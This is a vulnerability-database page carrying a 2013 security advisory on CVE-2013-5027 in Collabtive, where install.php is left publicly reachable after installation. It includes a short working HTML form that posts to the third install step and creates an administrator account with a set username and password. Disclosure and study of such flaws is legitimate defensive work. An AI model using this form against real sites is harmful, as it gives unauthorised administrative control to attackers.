Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23169
HistoryJul 31, 2013 - 12:00 a.m.

Improper Access Control in Collabtive

2013-07-3100:00:00
High-Tech Bridge
www.htbridge.com
15

0.006 Low

EPSS

Percentile

79.4%

JSON

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Collabtive, which can be exploited to gain complete control over the application.

  1. Improper Access Control in Collabtive: CVE-2013-5027
    The vulnerability exists due to improper access restrictions to the third installation step after successfully installing the application. A remote attacker can send a specially crafted HTTP POST request to the “/install.php” script and create a new user with administrative privileges. The installation script is not deleted after application installation and is publicly available by default.
    The following exploitation example creates a user with login “newadmin” and password “newpass”:
    <form action=“http://[host]/install.php?action=step3” method=“post” name=“main”>
    <input type=“hidden” name=“name” value=“newadmin”>
    <input type=“hidden” name=“pass” value=“newpass”>
    <input type=“submit” id=“btn”>
    </form>
CPENameOperatorVersion
collabtivele1.0

Related

prion 1
cvelist 1
nvd 1
cve 1
prion
prion
Improper access control
2019-12-27 18:15:00
cvelist
cvelist
CVE-2013-5027
2019-12-27 17:02:34
nvd
nvd
CVE-2013-5027
2019-12-27 18:15:10
cve
cve
CVE-2013-5027
2019-12-27 18:15:10

0.006 Low

EPSS

Percentile

79.4%

JSON
Related for HTB23169
prion1cvelist1nvd1cve1